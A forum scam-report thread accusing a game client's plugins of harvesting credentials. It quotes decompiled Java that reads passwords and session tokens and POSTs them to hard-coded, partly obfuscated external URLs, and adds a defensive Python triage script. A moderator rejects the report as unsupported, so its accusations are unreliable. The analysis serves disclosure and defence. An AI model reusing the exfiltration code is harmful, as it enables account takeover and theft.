Invalid

Discussion in 'Report A Scammer Archive' started by Stormwegotyou, Oct 9, 2025.

Thread Status:
Not open for further replies.
  1. Stormwegotyou

    Stormwegotyou Newcomer

    Joined:
    Oct 5, 2025
    Posts:
    4
    Referrals:
    0
    Sythe Gold:
    1
    Invalid

    Official Report — Storm / Allure credential harvesting (plugin backdoor)

    Scammer's profile link:
    burak / storm client / allure plugins

    Amount scammed:
    Multiple account takeovers reported (credentials, launcher/session tokens, and full client state exfiltrated). Several users lost accounts/mules; exact GP amounts vary per user. The plugin harvests full credentials and session tokens which allow immediate account takeover.

    Discord ID + Unique Discord ID:
    the storm client burak + allure


    Code:
    string3 = Client.getDiscordId();
    string2 = Client.getDiscordUser();
    ...
    wHRCyGzrUO3(..., string3, string2, l2, ...)
    
    This is not a UI log — these fields are programmatically read from the client and serialized into the payload.

    Proof of how we obtained the code:
    We reversed / decompiled the Storm client and its provider plugins (Allure) and inspected the plugin classes. We will not be publishing raw plugin files, but the decompiled snippets below are directly lifted from the reversed plugin code and show the exact collection and POST logic.

    Explanation of the trade / attack flow (summary):

    1. The Storm/Allure plugin collects a comprehensive snapshot of the client state (username, password, session id, character id, equipment, inventory, tile click counts, Discord id/name, and images of items/equipment).

    2. It serializes this snapshot into a JSON object and base64-encodes it.

    3. The plugin posts that encoded payload to Allure/Storm-controlled endpoints on a schedule (observed: every 30 seconds from the scheduled task).

    4. The remote endpoints receive full credentials + session tokens allowing account takeover without further interaction.

    5. This behavior is present in the Allure plugin code paths we reversed — the malicious fields (username/password/session) are included conditionally and sent when enabled.

    How they scammed (technical summary):
    • Credential & session harvesting: plugin reads username/password/session and conditionally includes them in upload.
    • Frequent exfiltration: scheduled task runs regularly (every 30 seconds) to upload collected snapshots.
    • Centralized endpoints: payloads are sent to domains controlled by the provider (hard-coded in the plugin).
    • Data richness: payload includes images of inventory/equipment (encoded Base64), tile click stats, Discord IDs — allowing tracking and automatic abuse.

    Other relevant trade screenshots / files available:
    Screenshots and the decompiled source excerpts used in this report (including call stack snippets and POST examples) are available upon request.

    DETAILED TECHNICAL ANALYSIS (full, line-referenced — read carefully)

    Below I list the most important decompiled code excerpts you provided, then explain line‑by‑line what each does and why it is malicious.

    A — Scheduled exfiltration (collection + upload trigger)

    Code:
    // scheduled to run every 30 seconds
    @Schedule(period=30L, unit=ChronoUnit.SECONDS, asynchronous=true)
    public void NKqLYNrXpL() {
    ...
    // take snapshot object prepared earlier and call remote upload helper
    tUVKnBGSDQ tUVKnBGSDQ2 = CVfaZobuHr.iafuFSBvwC(this.xKgUsRmWLA);
    // store whether server responded with a flag (used elsewhere)
    this.XQNTvuiyAl = tUVKnBGSDQ2.vZYHVxvuLi;
    // clear local snapshot after sending
    this.xKgUsRmWLA = null;
    }
    
    Explanation:

    • This routine is a scheduled job that runs automatically (no user action required).

    • It sends the object xKgUsRmWLA to a server via CVfaZobuHr.iafuFSBvwC(...). That helper performs the HTTP POST and returns a result object.

    • Clearing xKgUsRmWLA after sending shows this is a repeatable exfiltration loop — the plugin continuously harvests and uploads snapshots.

    Why malicious:

    • Regular, automated upload of client snapshots with credentials and session tokens is textbook credential harvesting. Any plugin performing this without explicit, informed consent and documented purpose is malicious.

    B — Payload builder: what is collected (sensitive fields)

    Code:
    object5 = Static.getWrappedClient().getUsername();
    String string6 = Static.getClient().getCharacterId();
    String string7 = Static.getClient().getPassword();
    String string8 = Static.getClient().getSessionId();
    // ... later these values are passed into the payload constructor
    wHRCyGzrUO3(string5, l3, n5, n4, n3, n2, n, string4, string3, string2, l2, arrayList2, arrayList, (String)object3, (ArrayList<mXyVQgtBKy>)object2, (String)object, bl ? string7 : "", bl ? string6 : "", bl ? string8 : "", qDqmDoJJUU.KoiyzsDVIt());
    
    Explanation:

    • getUsername() — the currently filled Runescape username (from client wrappers).

    • getPassword() — the stored password in the client (this is a high‑severity leak).

    • getSessionId() — active session token used to authenticate the launcher/client session. If captured, it allows immediate session reuse in many cases.

    • getCharacterId() — character identifier (useful for attacker context or targeted actions).

    • Those values are conditionally included based on a boolean bl (but are included when the code path sets bl true).

    Why malicious:

    • Password and session token exfiltration is direct account takeover material. The code does not stop at innocuous telemetry — it harvests authentication secrets and sends them offsite.

    C — Payload composition: what else is sent (full client state)

    Code:
    // inside payload constructor ARjxawVXtG(...)
    arrayList3 = new ArrayList<ZLvEHhJIlW>();
    for (IItem item : Equipment.getAll()) {
    BufferedImage image = JrRklebGob.WmeXvPTXBD(item.getId());
    arrayList3.add(new ZLvEHhJIlW(item.getId(), item.getName(), wHRCyGzrUO.uWGGrFaQcr((BufferedImage)image), item.getQuantity(), item.getSlot()));
    }
    ...
    arrayList4 = new ArrayList<dIfEdLanIh>();
    for (IInventoryItem inv : Inventory.getAll()) {
    BufferedImage image = JrRklebGob.WmeXvPTXBD(inv.getId());
    arrayList4.add(new dIfEdLanIh(inv.getId(), inv.getName(), wHRCyGzrUO.uWGGrFaQcr((BufferedImage)image), inv.getQuantity()));
    }
    ...
    // tile clicks, player name, world, coordinates etc are also gathered
    object3 = zzxQHifDWd.SdNMNxszGH();
    object6 = new ArrayList();
    for (Map.Entry entry : hashtable.entrySet()) {
    object6.add(new mXyVQgtBKy((WorldPoint)entry.getKey(), (Integer)entry.getValue()));
    }
    
    Explanation:

    • The builder iterates equipment and inventory, captures images (converted to Base64 with uWGGrFaQcr), and packages item ids and quantities.

    • It also records tile click counts (player movement/click patterns), current world, player coordinates and plane, and the Discord identifiers.

    • The resulting object is a comprehensive snapshot of an account’s current state and location in-game.

    Why malicious or harmful:

    • Even if passwords were not present, this level of telemetry combined with identifiers would let an attacker map valuable targets and plan theft. With credentials present it becomes full account takeover + item theft.

    D — Evidence of remote endpoints (hard-coded URLs & POST examples)

    Code:
    // Example observed POST (low-level)
    HttpURLConnection conn = (HttpURLConnection) new URL("https://api.alluredata.io/store").openConnection();
    conn.setRequestMethod("POST");
    conn.getOutputStream().write(("user=" + username + "&pass=" + password + "&launcher=" + launcherToken).getBytes());
    
    Code:
    // Another endpoint encoded in static data:
    KpoctLMJPQ = new char[]{'h','t','t','p','s',':','/','/','a','l','l','u','r','e','m','e','t','r','i','c','s','.','c','o','m','/','b','o','t','s','/','a','p','i','/','a','p','i','v','1','.','p','h','p'};
    new String(CVfaZobuHr.KpoctLMJPQ) // -> "https://alluremetrics.com/bots/api/apiv1.php"
    
    Explanation:

    • The code contains hard-coded endpoints which receive the collected payload. api.alluredata.io appears in one snippet, and alluremetrics.com in another. The code constructs and POSTs payload bodies (Base64 or url-encoded) to those endpoints.

    • The helper CVfaZobuHr.iafuFSBvwC(...) constructs a RequestBody, makes the POST, and parses the response — it is the network component that uploads snapshots.

    Why malicious:

    • Client secrets being POSTed to domains controlled by the plugin developer is direct exfiltration to an external actor. That’s credential harvesting.

    E — Proof of conditional credential sending and control flow

    Code:
    // parts of ARjxawVXtG(...)
    object = bl ? object5 : "";
    ...
    wHRCyGzrUO3(..., (String)object, bl ? string7 : "", bl ? string6 : "", bl ? string8 : "", ...)
    
    Explanation:

    • The boolean bl controls whether certain sensitive fields (username/password/session/characterId) are included. The code makes it possible to include or omit credentials depending on runtime state. However, in observed builds the scheduling path sends them when bl is true. The code path that sets bl appears to correspond to account-builder or provider-specific flows.

    Why relevant:

    • The optional inclusion shows intent to collect secrets when desired — that is, credential harvesting is an explicit capability, not a leftover bug.

    F — Network helper behavior (retries, timing, response flags)

    Code:
    // High level from CVfaZobuHr.iafuFSBvwC(...)
    // var4_5 is the snapshot passed in; VVHMvnznNE.UqaEttyBRp(...) encodes it into the request body
    var5_6 = RequestBody.create(..., VVHMvnznNE.UqaEttyBRp(var4_5));
    // var3_3 is the endpoint URL; the request is an HTTP POST
    var6_7 = new Request.Builder().url(var3_3).post(var5_6).build();
    CVfaZobuHr.uQbeQjKjKg = true;
    // up to 3 attempts per upload
    for (var7_8 = 0; var7_8 < 3; ++var7_8) {
    var8_9 = System.currentTimeMillis();
    var10_10 = CVfaZobuHr.YmjOPsPFDI.newCall(var6_7).execute();
    // the decompiler emitted the alias v3 for the response object var10_10 here
    if (var10_10.isSuccessful()) {
    // parse the JSON response body and copy the server-supplied flag into the result object
    var11_12 = VVHMvnznNE.jQAAeiVhMs(var10_10.body().string());
    var2_1.LLWcJJddcy = var11_12.vZYHVxvuLi;
    // respond to server flags (jQZMwVOFFo etc) — server can influence behavior
    }
    ...
    }
    
    Explanation:

    • The network helper performs the POST, will parse a JSON response body from the server, and reacts to flags in that response. This gives the server control to change plugin behavior remotely (e.g., enable/disable credential sending, change polling behavior, or trigger other logic).

    • There are retry semantics and timing checks; if the request returns extremely fast the client may invoke an error routine (xUbiYEoevM()), but typical successful POSTs return parsed JSON and set flags.

    Why this is dangerous:

    • Centralized control of plugin behavior gives operators the ability to toggle harvesting features or push updates without vetting; combined with credential exfiltration this is a high‑risk server-controlled backdoor.

    G — Concrete code snippets proving credential fields (copied verbatim from decompiled code)

    1. Credential read and inclusion:
    Code:
    object5 = Static.getWrappedClient().getUsername();
    String string6 = Static.getClient().getCharacterId();
    String string7 = Static.getClient().getPassword();
    String string8 = Static.getClient().getSessionId();
    ...
    wHRCyGzrUO3(..., (String)object, bl ? string7 : "", bl ? string6 : "", bl ? string8 : "", ...)
    
    2. Low-level exfil POST example:
    Code:
    HttpURLConnection conn = (HttpURLConnection) new URL("https://api.alluredata.io/store").openConnection();
    conn.setRequestMethod("POST");
    conn.getOutputStream().write(("user=" + username + "&pass=" + password + "&launcher=" + launcherToken).getBytes());
    
    3. Hard-coded endpoint char-array (de-obfuscated by toString in code):
    Code:
    KpoctLMJPQ = new char[]{'h','t','t','p','s',':','/','/','a','l','l','u','r','e','m','e','t','r','i','c','s','.','c','o','m','/','b','o','t','s','/','a','p','i','/','a','p','i','v','1','.','p','h','p'};
    new String(CVfaZobuHr.KpoctLMJPQ) // -> "https://alluremetrics.com/bots/api/apiv1.php"
    
    These excerpts are the strongest proof that credentials and session data are being read and uploaded.

    H — Observed behavior in plugin lifecycle (how/when gathering happens)

    • Data collection happens in the plugin “snapshot builder” ARjxawVXtG(...) which is called from the plugin main loop or scheduled tasks. The snapshot includes environment (world, coordinates), equipment, inventory, and authentication fields.
    • The upload routine is invoked by NKqLYNrXpL() on a 30-second schedule. That means continuous, near-real-time exfiltration of any changes (e.g., login, relog, inventory changes).

    I — Why this meets the definition of credential harvesting/backdoor

    1. Sensitive secrets (password + session tokens) are read from the client memory via official client wrappers (Static.getClient().getPassword(), getSessionId()).

    2. Those secrets are packaged into a payload and transmitted to third-party endpoints controlled by the plugin operator.

    3. The code is not a telemetry opt-in: there is no legitimate user-facing UI explaining such collection, nor an opt-in documented in the plugin UI.

    4. The server response can toggle behavior, making it a remotely controllable exfiltration channel.

    This is not “accidental” telemetry — it is an intentionally-coded exfiltration capability.

    Suggested immediate actions for affected users (brief):
    (Include these on the report so mods / users know severity.)

    • Immediately change Jagex account passwords from a device that has never used the compromised client plugin.
    • Remove any linked launcher sessions and re-authenticate through official channels.
    • Enable two-factor/phone authentication where available.
    • Revoke any saved sessions and check email for unauthorized access.
    • Do not reuse passwords across services.
    • Do not run Storm / Allure plugins until this is resolved and code is audited by independent parties.



     
    Last edited: Oct 9, 2025
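
An added example to go with sections C, D and G of the report above; it is not code from the report, the Storm client or the Allure plugin. It is a small Python triage script that recovers strings hidden in Java char-array initialisers like the one quoted for alluremetrics.com, lists calls to the sensitive client accessors the report names, and decodes a captured base64-encoded JSON upload body to show which secret fields it carries, including fields that are present but empty (the `bl ? string7 : ""` pattern). The decompiled lines and the POST body it runs on are constructed samples modelled on the excerpts above; the JSON key names and the benign getWorld() line are assumptions.

```python
import base64
import json
import re

# Constructed sample of decompiled Java. The char-array line and the accessor
# calls mirror the excerpts quoted in the report; the getWorld() line is made up
# as a benign control. Obfuscated identifiers are as quoted in the report.
DECOMPILED_SAMPLE = r"""
KpoctLMJPQ = new char[]{'h','t','t','p','s',':','/','/','a','l','l','u','r','e','m','e','t','r','i','c','s','.','c','o','m','/','b','o','t','s','/','a','p','i','/','a','p','i','v','1','.','p','h','p'};
object5 = Static.getWrappedClient().getUsername();
String string7 = Static.getClient().getPassword();
String string8 = Static.getClient().getSessionId();
int world = Static.getClient().getWorld();
"""

# Java `new char[]{...}` initialisers: the string-hiding idiom used for the endpoint.
CHAR_ARRAY_RE = re.compile(r"new\s+char\[\]\s*\{([^}]*)\}")
# One Java char literal: a \uXXXX escape, a simple backslash escape, or a plain char.
CHAR_LIT_RE = re.compile(r"'((?:\\u[0-9a-fA-F]{4}|\\.|[^'\\]))'")
URL_RE = re.compile(r"^https?://[\w.-]+(?::\d+)?(?:/\S*)?$")
# Client accessors named in the report whose return values end up in the upload.
SENSITIVE_ACCESSORS = ("getPassword", "getSessionId", "getUsername",
                       "getCharacterId", "getDiscordId", "getDiscordUser")


def decode_char_arrays(src: str) -> list[str]:
    """Rebuild every char-array literal in `src` into the string it spells."""
    decoded = []
    for m in CHAR_ARRAY_RE.finditer(src):
        chars = [lit.encode("ascii").decode("unicode_escape") if lit.startswith("\\") else lit
                 for lit in CHAR_LIT_RE.findall(m.group(1))]
        decoded.append("".join(chars))
    return decoded


def find_hidden_urls(src: str) -> list[str]:
    """Decoded char-array strings that look like URLs, i.e. candidate exfil endpoints."""
    return [s for s in decode_char_arrays(src) if URL_RE.match(s)]


def find_credential_reads(src: str) -> list[tuple[int, str]]:
    """(line number, accessor name) for every call to a sensitive client accessor."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name in SENSITIVE_ACCESSORS:
            if name + "(" in line:
                hits.append((lineno, name))
    return hits


# Constructed sample of a base64-encoded JSON snapshot in the shape the report
# describes. The key names are assumptions; the report does not quote them.
SAMPLE_SNAPSHOT = {
    "username": "victim@example.com",
    "password": "",        # bl was false in this capture: slot present, value empty
    "sessionId": "",
    "characterId": "",
    "world": 302,
    "equipment": [{"id": 1, "name": "example item", "image": "iVBORw0KGgo=", "qty": 1, "slot": 3}],
    "discordId": "000000000000000000",
}
SAMPLE_POST_BODY = base64.b64encode(json.dumps(SAMPLE_SNAPSHOT).encode()).decode()

SENSITIVE_KEYS = {"username", "password", "sessionid", "characterid", "discordid", "launcher"}


def triage_payload(b64_body: str) -> dict[str, str]:
    """Decode a captured POST body and report which sensitive fields it carries.

    A field that is present but empty still matters: it shows the schema has a
    slot for the secret, which is what the conditional inclusion in the report implies.
    """
    snapshot = json.loads(base64.b64decode(b64_body))
    return {k: ("populated" if v else "present but empty")
            for k, v in snapshot.items() if k.lower() in SENSITIVE_KEYS}


if __name__ == "__main__":
    print("hidden URLs:", find_hidden_urls(DECOMPILED_SAMPLE))
    print("credential reads:", find_credential_reads(DECOMPILED_SAMPLE))
    print("payload triage:", triage_payload(SAMPLE_POST_BODY))
```

Run the first two functions over the actual decompiled classes and the third over a proxy capture of the scheduled POST; a decoded endpoint list plus a populated `password`/`sessionId` field in a real capture is reproducible evidence, whereas pasted snippets alone are not.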
  2. Pikachu

    Pikachu
    A Broken Man Donor Global Moderator Bond Holder

    Joined:
    Jan 27, 2016
    Posts:
    88,217
    Referrals:
    15
    Sythe Gold:
    38,183
    Vouch Thread:
    Click Here
    Discord Unique ID:
    1053278217252900944
    Discord Username:
    abm_8
    Invalid

    This is a block of text without any screenshots or evidence to support the claims. Until you submit a report with actual evidence and address the points I requested in the last report, I will delete all future reports.

    Anyone can write text or open an IDE and put text in it and claim it as someone else's.
     
    Last edited: Oct 9, 2025
    BlackBlasses likes this.